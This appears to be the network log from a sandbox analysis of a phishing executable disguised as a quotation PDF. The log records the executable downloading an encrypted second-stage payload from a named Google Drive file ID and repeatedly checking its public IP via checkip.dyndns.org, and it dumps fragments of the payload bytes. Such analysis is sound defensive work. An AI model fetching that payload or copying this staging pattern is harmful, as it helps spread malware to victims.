                                                                                                                                Date: Mon, 16 Dec 2024 07:45:16 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 2fbdba07851b3206b7871b2058fc6dca
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.549908158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:18.484213114 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:19.688147068 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:19 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 9d2a2e7e16961cd1921e18bec2de835c
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.549919158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:21.966839075 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:23.179970026 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:22 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 6303f18940a11b9e078f1679cae07bc4
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.549930193.122.130.080616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:25.598035097 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:26.695615053 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 848dbb888a1ab68f2e2f49bd214d5708
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.549938193.122.130.080616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:28.832575083 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:29.936479092 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:29 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: af39b14e06f2a5c22cfa31a22ac70203
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.549949193.122.130.080616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:32.122556925 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:34.158066988 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:33 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 783135d0138481a3fb0d48aa4811438d
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.549961193.122.130.080616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:36.511266947 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:37.608104944 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:37 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 6950c46c84bd45c591ef667dd99f54e9
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.549969193.122.130.080616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:39.832798004 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:41.929605007 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 2e9b72037118b75469fa8eb581f0b169
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549790172.217.19.174443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:33 UTC216OUTGET /uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Host: drive.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-16 07:44:34 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:34 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'nonce-pXvxGHE40Yaj-6V0GYm3Pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549802142.250.181.1443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:36 UTC258OUTGET /download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:44:39 UTC4939INHTTP/1.1 200 OK
                                                                                                                                X-GUploader-UploadID: AFiumC6HLVupzY8K2uf9YWDcdIczHASiTlS6vHhlpMOskO7G6jh_KJfPkhEXKS6R-mAI3KwZ
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Content-Disposition: attachment; filename="fmmFdTckrikVXlvt156.bin"
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 94272
                                                                                                                                Last-Modified: Mon, 16 Dec 2024 03:29:51 GMT
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:38 GMT
                                                                                                                                Expires: Mon, 16 Dec 2024 07:44:38 GMT
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                X-Goog-Hash: crc32c=+J2ItA==
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2024-12-16 07:44:39 UTC4939INData Raw: 79 70 c4 63 a8 4b 2b 13 1c b6 15 5f 14 2d 62 ef e3 a2 ad 56 06 d8 5b 70 6e ee 35 48 81 82 46 b4 db b7 d5 e4 a6 64 00 64 ec 26 26 2c 4b 34 b4 a4 e0 34 4e 61 c7 79 02 a7 f2 69 75 b4 5f 64 1b 00 ee 25 9e 81 b7 df 1f b5 1e ba 15 bf ef d9 34 9b d7 aa 08 0d e4 52 2a 61 41 ab 37 31 5e 9f 03 03 b7 e5 ac 35 a6 b5 5d 52 11 d5 c7 91 a8 6e 16 e3 bf 31 bf 83 ae 36 45 c4 f8 9d ae 3e ee 50 b0 5d 80 20 f6 c4 b5 28 12 3f 4a 05 64 90 0e 81 70 3a 61 19 5d 12 f4 2b 29 6b f9 b7 17 a6 fc ad 6d c1 ff 84 a3 e1 55 70 7b aa 2c 17 ca af cd 54 0d a9 d9 64 a1 1a 7a ea 51 da 30 11 be cf e7 39 e0 b5 1b 97 cb 2f da b7 d7 62 e9 83 b5 30 52 d5 fe c7 0f cd 95 c7 74 28 87 6f f5 92 6b f2 01 e7 73 c6 f2 24 06 d5 f9 01 b0 6c ac cc d5 54 5d b4 fd 4d 04 d0 87 42 d2 d4 57 26 3f 9b b9 64 3d f2 6c
                                                                                                                                Data Ascii: ypcK+_-bV[pn5HFdd&&,K44Nayiu_d%4R*aA71^5]Rn16E>P] (?Jdp:a]+)kmUp{,TdzQ09/b0Rt(oks$lT]MBW&?d=l
                                                                                                                                2024-12-16 07:44:39 UTC4822INData Raw: 73 f0 6b 13 80 54 99 da 5a 3a d9 88 63 b7 b1 f5 81 ad e9 35 c0 ee 34 64 86 90 dc 85 6d 05 f3 0a be 8c 84 b8 c9 45 87 15 e3 2f 5f 29 de 29 50 e8 9c 73 53 73 0f ba e1 b7 a9 4f 97 86 c3 cd 99 79 34 95 6f b6 a7 57 6c 63 c0 03 f1 a8 bb ef a2 96 b6 0c 90 c4 6d 4c c1 ca dd 29 b9 9b 99 e4 63 9f 31 f2 09 99 a1 58 5e 4c 90 2b 34 59 64 49 52 1f a3 f2 9e 85 3e 87 d2 18 0e f0 cb c3 f4 54 84 8e f5 af cb 5f ef 6e 7b 62 be 19 09 67 a2 7e 18 da e3 d6 d9 37 59 61 9a e2 33 8e af ff d3 f3 83 64 0a 3e 99 93 4c af 44 36 f5 1b 39 79 da 85 ae d4 dc f1 6a 37 bd 75 25 1e 38 a7 43 e3 3d b1 27 9f b3 88 dc 18 ec f5 8a 7e 87 a3 11 59 a9 ca 06 5d c7 f6 70 ad 94 5c 2a 33 7e 68 4d b7 76 31 d9 21 b3 b9 de ad 39 04 57 5b 23 bf b4 2b 81 0c be 50 b2 ad 47 29 28 0e ba bb f0 fd 89 39 e5 61 ca
                                                                                                                                Data Ascii: skTZ:c54dmE/_))PsSsOy4oWlcmL)c1X^L+4YdIR>T_n{bg~7Ya3d>LD69yj7u%8C='~Y]p\*3~hMv1!9W[#+PG)(9a
                                                                                                                                2024-12-16 07:44:39 UTC1320INData Raw: 48 16 d1 d3 e5 72 e1 44 70 86 a5 0b 6a 47 b0 b8 b4 2d e0 fa f9 d7 0e cb 60 3b e1 50 4d 21 1e df 8a 16 29 15 d6 b8 2e e9 9d 4b e0 52 4a a8 6b f1 73 95 f2 aa 81 be 0d ca b2 e0 6e 40 46 de 58 56 9f 9c 42 43 63 1c 22 2d 49 9d de 89 02 30 35 2a 15 fd 9d 26 b2 d7 07 f5 7d 1a 70 4b 65 b8 23 1e bf c7 62 1c ec a1 71 26 92 8c 4e 98 84 75 64 d3 cf f2 b2 0b f0 28 e2 23 f1 24 ab b5 f4 64 50 45 ba 1f 0d 49 a7 8f 9e ce c2 1d fe dc 5b c2 cf 34 be 22 28 4c 45 0c a7 0f 70 22 de 64 2b 59 f7 ca 9a 64 81 26 00 59 83 fd 22 66 b7 33 fa 5d 83 db f5 59 ce 47 7d 1e be 72 4b e5 f9 a5 52 e2 cf 97 78 be 93 6a 44 53 78 71 71 93 85 23 1a 05 8f f8 ff 12 f1 b0 6d 5e c1 d0 6c f0 a6 2c be d2 f0 b4 a6 a0 8a e6 04 a4 14 10 38 05 b7 79 bc 54 a7 28 2b 1f 2a f4 39 84 98 4c bf d6 57 cb 12 e5 30
                                                                                                                                Data Ascii: HrDpjG-`;PM!).KRJksn@FXVBCc"-I05*&}pKe#bq&Nud(#$dPEI[4"(LEp"d+Yd&Y"f3]YG}rKRxjDSxqq#m^l,8yT(+*9LW0
                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: 4a 35 1d 7f 10 f9 8b 80 ed 25 fc c9 16 3c e6 5c 56 0b cd 46 ad 9f 7c 06 e0 3a 86 d2 a4 fe 77 bc 5c 97 16 51 22 8c 48 f6 87 e6 eb 86 d2 56 28 46 9a 5d 6e 44 64 ce 7c 39 7e 5d ce c4 12 2b 7e 99 e5 e6 28 d4 1e 72 45 1b 47 3b b7 95 9a 09 37 4c 3a 07 40 4a 22 79 c7 6b 82 c3 99 54 ec 59 93 fc c5 2e 0a 75 0b 94 32 ff fc 4c eb 27 9d 6e fb a4 16 6c f0 00 c9 c0 88 cc 7a 36 3e cd d1 01 99 ae 4d 14 4b e2 6a 78 3b 7c 80 b3 9b b6 f8 f7 26 19 df cf b9 4b 2d 96 96 6d 07 59 cc 84 4a 0d 35 7c a1 e4 90 94 2f 47 2b 8a 5a d5 89 5a 99 7a a8 4f e9 02 e8 85 f2 b3 bc 49 cf 6e b0 eb e0 7d fa 19 8d 5c b4 da 2c 6a b0 e7 e3 c5 8b e9 81 d4 e9 9c c0 ee 34 c6 dd 95 a2 5b 69 2d 72 78 53 90 84 16 aa 9a 8e 39 ee 84 15 30 a0 f7 5a e8 4a df a4 41 27 f9 8e 68 a3 5c 99 24 ce 86 e7 a7 3e 48 72
                                                                                                                                Data Ascii: J5%<\VF|:w\Q"HV(F]nDd|9~]+~(rEG;7L:@J"ykTY.u2L'nlz6>MKjx;|&K-mYJ5|/G+ZZzOIn}\,j4[i-rxS90ZJA'h\$>Hr
                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: 15 db 6d 8c fb 4c c6 4d fd a3 db a4 68 1b 35 6c bd 42 be 40 6d 5c 1b 39 79 a6 18 bf da c7 ff 09 61 d5 71 52 71 a3 d9 5e e9 2a 63 3a e2 b8 88 a6 23 bb e4 84 06 bc 2a 11 29 8b 84 78 4f cd e5 65 cf 11 45 59 c9 6d 6f 56 a2 0b b5 cb 4e 48 a8 d9 c8 18 17 44 40 30 d6 4e 3c 57 85 94 c7 b2 ac 5e 2e 36 63 b4 c9 12 fc fb d5 fd 77 ab 3f 2f 9d 1f eb 8d fe c2 7e 4c cb 27 2f 64 4a b6 80 96 4f 28 29 fc d4 77 94 a1 60 1a 78 9d 30 2a 62 cf 9a b8 f2 0d 81 ed e3 fa d7 41 a2 c8 96 7a 53 71 54 b4 89 cc bf 26 61 0f 70 aa 3f 5e 25 62 d5 83 61 28 88 10 18 5c ac f9 a5 34 36 64 4e 5f f9 ba 9b 10 e0 d9 97 b0 e8 c7 3d ed c0 20 42 6e 7f cc 37 72 e0 72 29 28 b6 58 1f 94 7c 89 6b 53 3c 49 34 ed 90 df 31 d0 41 75 65 67 8a df 91 2d e8 8b 16 d4 b1 fd 13 8a 7c d6 ae be 2e 65 93 21 b0 d1 fd
                                                                                                                                Data Ascii: mLMh5lB@m\9yaqRq^*c:#*)xOeEYmoVNHD@0N<W^.6cw?/~L'/dJO()w`x0*bAzSqT&ap?^%ba(\46dN_= Bn7rr)(X|kS<I41Aueg-|.e!
                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: 51 66 91 4e 65 1c 98 cc 3d ee 9d c5 29 ae 8b bf f1 82 75 10 0f c4 0c 4f a4 8f 98 1b 5c fb 7c 10 c5 0f 7c a9 5c d0 1e 1a a8 42 be 39 e0 b4 47 d5 e3 d7 96 b6 de 74 a0 b8 cd 88 41 d0 ef c2 23 c4 81 d4 90 28 bd b3 fe 93 3b f2 73 63 69 c6 82 32 75 2c f9 01 ba 6b 5a b3 d4 54 57 bc 06 4d 04 7a 95 44 c3 d2 78 da 3f bb b3 77 35 db 2f af c5 db 1d e1 66 71 4a 63 2b 1b 39 4e d8 c2 e8 2e ad 44 70 8d cb 4b 7b 4d db 40 a2 2f 91 a3 f2 c6 01 da 17 61 ed 7c 50 18 c6 b0 74 1c 29 1d c4 59 b8 94 d0 41 8f 56 49 aa 1a 94 19 95 f6 88 5c be 0d c0 de a4 01 c0 42 de 52 6f 92 8d 4f 7d e3 c0 35 a6 41 e8 cf ad 02 31 08 27 06 8e ae 37 b2 d3 78 c9 7c 1a 7a 69 31 64 2b 9a dc da ab 0f 27 b2 8b a6 c9 f7 08 99 97 76 44 1b de f5 ae 03 7e 41 fb 82 93 42 ab b1 80 37 50 54 b7 23 4f 61 40 85 95
                                                                                                                                Data Ascii: QfNe=)uO\||\B9GtA#(;sci2u,kZTWMzDx?w5/fqJc+9N.DpK{M@/a|Pt)YAVI\BRoO}5A1'7x|zi1d+'vD~AB7PT#Oa@
                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: d7 04 fd a4 56 e9 e2 f4 b0 f2 72 8a e6 3d a4 14 01 12 1a ab 4a 54 5e a7 08 58 3f 37 d1 49 ac c7 4c bd a2 60 cb 14 c9 b6 e4 6a 89 05 8e 16 02 64 4e 5b 5b 4f a5 b7 10 ff 81 2a ba 67 92 e5 73 53 44 fe 73 14 e2 21 06 4c 7c 00 44 08 46 b3 e4 fd 64 cb c6 a5 0c 58 4d 42 59 f1 f3 2c d2 9a d0 59 e8 46 ea f9 4b ec 75 c9 04 54 66 23 b1 ab c7 2f 6f 9b de ac 20 c5 13 80 d6 07 47 4f d8 52 98 21 ec 5f 3f 1c 56 67 a0 7c ea fc 4f c4 9a 5e 3e 0c 99 d4 c6 34 65 7e 64 90 39 ff 2a 23 c5 24 9d 64 f9 31 06 6c f6 11 c0 cc 81 a2 13 37 22 c7 c0 0b 8f 4b 7c 0d 40 b9 62 54 2d 78 2a b3 8a bc 9a 2b 49 46 d5 c4 a9 d7 1b be 03 6c 22 49 ad 4b 5f 0d 45 f5 a4 f3 ca d8 3a 47 51 20 6e ca 89 c4 93 7a a8 82 19 1b 9a 9d 8b ec cc eb c9 52 1f ef fa f6 78 1c 8d 4c 95 be b0 b1 b0 97 ff 9f 30 ff 81
                                                                                                                                Data Ascii: Vr=JT^X?7IL`jdN[[O*gsSDs!L|DFdXMBY,YFKuTf#/o GOR!_?Vg|O^>4e~d9*#$d1l7"K|@bT-x*+IFl"IK_E:GQ nzRxL0
